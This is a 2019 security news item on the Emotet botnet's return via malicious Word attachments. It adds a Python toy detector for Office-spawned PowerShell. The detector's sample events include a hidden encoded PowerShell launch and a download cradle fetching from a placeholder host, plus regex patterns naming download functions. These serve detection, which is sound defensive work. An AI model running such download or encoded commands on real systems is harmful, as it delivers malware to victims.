Delaware, USA – September 17, 2019 – It took Emotet operators nearly a month to bring their monster back to life, remove the bots of security firms from the infrastructure, and prepare a new spam campaign. Starting Monday morning, September 16, malicious emails began to appear in the United States, the United Kingdom, Italy, Germany, and Poland. The attackers are targeting government entities, companies, and individuals. According to Cofense Labs, about 66,000 unique emails were sent in the first wave of the spam campaign, and the attackers continue to use both reply-chain style emails and regular phishing emails. The emails were sent from more than 3,300 systems, but only a small part of them targeted specific address lists; the rest used contact lists stolen from the senders.
The malicious emails contain a Microsoft Word document with a script that uses PowerShell to download, from compromised websites, the latest version of the Emotet malware, which most antivirus solutions cannot yet detect. The infection does not end there: immediately after installation, Emotet downloads and installs the Trickbot trojan, which is often used for subsequent attacks by the Ryuk cybergang. The Emotet botnet is back, and now the eventful summer can fade in the face of the gifts of autumn.
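The delivery chain described above (a Word document whose script launches PowerShell to fetch the payload) leaves a distinctive trace in process-creation telemetry: an Office application as the parent of PowerShell, often with a download cradle or an encoded command on the command line. The following is an added example written for this page, not code from SOC Prime or from the Threat Detection Marketplace content linked below. It runs a few simple rules over constructed records that borrow the field names of Sysmon Event ID 1 (UtcTime, Image, ParentImage, CommandLine); the sample events, the rule names, and the function names are assumptions made for illustration.

```python
"""Toy detector for Office-spawned PowerShell download activity.

The events below are constructed for this example and loosely follow the
field names of Sysmon Event ID 1 (process creation). Nothing here comes from
the original page or from the detectors it links to.
"""
import re

# Parent processes that should rarely spawn a shell on a workstation.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Substrings typical of PowerShell download cradles (case-insensitive).
DOWNLOAD_HINTS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"start-bitstransfer|net\.webclient",
    re.IGNORECASE,
)
# -e / -enc / -EncodedCommand switches hide the script body from casual review.
ENCODED_FLAG = re.compile(r"-(e|enc|encodedcommand)\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path (handles / and \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the list of rule names that match one process-creation event."""
    reasons = []
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if image not in SHELLS:
        return reasons  # only PowerShell launches are of interest here
    if parent in OFFICE_PARENTS:
        reasons.append("office-spawned-powershell")
    if DOWNLOAD_HINTS.search(cmd):
        reasons.append("download-cradle")
    if ENCODED_FLAG.search(cmd):
        reasons.append("encoded-command")
    return reasons


def detect(events):
    """Return (UtcTime, image name, reasons) for every event hitting a rule."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            hits.append((ev.get("UtcTime"), basename(ev.get("Image", "")), reasons))
    return hits


# Constructed sample telemetry: one benign Word launch, one Word -> PowerShell
# chain with an encoded command, one cmd -> PowerShell download cradle, and one
# benign PowerShell launch that should not fire.
SAMPLE_EVENTS = [
    {"UtcTime": "2019-09-16 09:12:01",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "invoice.doc"'},
    {"UtcTime": "2019-09-16 09:12:07",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell -w hidden -enc AAAA..."},
    {"UtcTime": "2019-09-16 09:12:09",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/x')"},
    {"UtcTime": "2019-09-16 09:15:00",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "powershell Get-Service"},
]

if __name__ == "__main__":
    for when, image, reasons in detect(SAMPLE_EVENTS):
        print(when, image, ", ".join(reasons))
```

The parent-child rule is the one that matters most for this campaign: a download cradle or an encoded command on its own also appears in legitimate administration, so in production the three signals would be weighted or combined rather than alerted on individually.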
Content available on Threat Detection Marketplace to detect the malware:
Emotet Trojan detector (Sysmon) – https://tdm.socprime.com/tdm/info/1279/
TrickBot Malware Detector (Sysmon Behavior) (July 2019) – https://tdm.socprime.com/tdm/info/2335/
Trickbot Execution – https://tdm.socprime.com/tdm/info/2207/